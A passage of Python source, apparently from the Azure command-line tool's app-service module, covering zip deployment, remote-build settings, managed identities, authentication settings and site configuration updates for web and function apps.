existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.utcnow()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# This SDK function throws an error if Status Code is 200
if ex.status_code != 200:
raise ex
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code != 200:
raise ex
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise ResourceNotFoundError("WebApp'{}', is not found on RG '{}'.".format(name, resource_group_name))
webapp.site_config = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None, # pylint: disable=unused-argument
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs): # pylint: disable=unused-argument
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.begin_create_or_update_slot if slot else client.web_apps.begin_create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None, force=False):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
# Ensure all plans involved are windows. Reserved = true indicates Linux.
if src_plan_info.reserved or dest_plan_instance.reserved:
raise ValidationError('This feature currently supports windows to windows plan migrations. For other '
'migrations, please redeploy.')
src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
'Elastic Premium plan. ' +
general_switch_msg)
if src_is_premium and dest_is_consumption:
logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
'functionality and cause the app to break. Please ensure the functionapp is compatible '
'with a Consumption plan and is not using any features only available in Premium.')
if not force:
raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.begin_create_or_update(resource_group_name, name, site_envelope=instance)
def get_functionapp(cmd, resource_group_name, name, slot=None):
function_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not function_app or 'function' not in function_app.kind:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return function_app
def list_webapp(cmd, resource_group_name=None):
full_list = _list_app(cmd.cli_ctx, resource_group_name)
# ignore apps with kind==null & not functions apps
return list(filter(lambda x: x.kind is not None and "function" not in x.kind.lower(), full_list))
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_restore_from_deleted_app',
slot, request)
def list_function_app(cmd, resource_group_name=None):
return list(filter(lambda x: x.kind is not None and "function" in x.kind.lower(),
_list_app(cmd.cli_ctx, resource_group_name)))
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update',
extra_parameter=webapp, slot=slot)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
web_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not web_app:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return web_app.identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot)
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None): # pylint: disable=unused-argument
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
try:
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
except StopIteration:
pass
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if (web_app.reserved or not web_app.is_xenon) else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any(linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
vnet_route_all_enabled=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled', 'vnet_route_all_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
# https://github.com/Azure/azure-cli/issues/14857
updating_ip_security_restrictions = False
result = {}
for s in generic_configurations:
try:
json_object = get_json_object(s)
for config_name in json_object:
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
result.update(json_object)
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
setattr(configs, config_name, value)
if not updating_ip_security_restrictions:
setattr(configs, 'ip_security_restrictions', None)
setattr(configs, 'scm_ip_security_restrictions', None)
